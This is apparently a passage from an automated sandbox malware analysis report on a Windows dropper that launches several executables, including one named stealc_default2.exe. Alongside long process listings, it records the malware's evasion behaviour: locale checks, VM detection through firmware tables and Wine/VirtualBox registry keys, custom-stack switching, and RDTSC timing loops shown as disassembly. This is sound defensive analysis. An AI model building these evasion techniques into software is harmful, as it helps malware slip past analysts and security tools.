Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_17-77361

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\svchost.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 1245AD4
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 12B9E0E
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 11F5364
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 114A544
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 1169810
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 131F1DA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 1165B58
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	API/Special instruction interceptor: Address: 15DCF4A

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F44F second address: A6F455 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2528 second address: BE2536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2536 second address: BE2559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9278BE2835h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2559 second address: BE2571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F927881D80Dh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE285B second address: BE2887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2831h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE2834h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE2887 second address: BE288B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE288B second address: BE289A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE289A second address: BE28A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5484 second address: BE54A1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnp 00007F9278BE2826h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE54A1 second address: BE54A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE54A7 second address: BE54AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE54AB second address: BE54F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 jbe 00007F927881D808h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007F927881D810h 0x00000022 jmp 00007F927881D815h 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE54F8 second address: BE54FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE54FC second address: BE5514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE559E second address: BE560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F9278BE2828h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D190Ah], edx 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D1C03h] 0x00000030 call 00007F9278BE2829h 0x00000035 push ecx 0x00000036 jmp 00007F9278BE282Fh 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007F9278BE2834h 0x00000044 push esi 0x00000045 pop esi 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE560C second address: BE5610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5610 second address: BE562C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9278BE282Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE562C second address: BE5640 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F927881D806h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5640 second address: BE5644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5644 second address: BE564A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE564A second address: BE5701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F9278BE2830h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F9278BE2828h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push ecx 0x0000002e push edi 0x0000002f sub dword ptr [ebp+122D2401h], edi 0x00000035 pop edi 0x00000036 pop edx 0x00000037 sub dword ptr [ebp+122D1C09h], ebx 0x0000003d push 00000003h 0x0000003f mov dword ptr [ebp+122D1843h], eax 0x00000045 push 00000000h 0x00000047 jmp 00007F9278BE2836h 0x0000004c push 00000003h 0x0000004e call 00007F9278BE2835h 0x00000053 jmp 00007F9278BE2836h 0x00000058 pop edi 0x00000059 push A7C0AC2Ah 0x0000005e push ebx 0x0000005f jnp 00007F9278BE282Ch 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE584E second address: BE586B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D818h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE586B second address: BE589B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F9278BE283Dh 0x00000013 jmp 00007F9278BE2837h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE589B second address: BE58B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F927881D80Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE58B5 second address: BE58BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04EAA second address: C04EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jg 00007F927881D806h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C04EBA second address: C04EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05281 second address: C05289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05289 second address: C0528E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0528E second address: C052E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F927881D817h 0x0000000c js 00007F927881D806h 0x00000012 popad 0x00000013 jmp 00007F927881D811h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push ecx 0x0000001c jo 00007F927881D806h 0x00000022 pop ecx 0x00000023 pushad 0x00000024 jmp 00007F927881D80Dh 0x00000029 jp 00007F927881D806h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05437 second address: C05451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05451 second address: C05457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05891 second address: C058CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F9278BE2828h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9278BE2833h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9278BE2839h 0x0000001a rdtsc
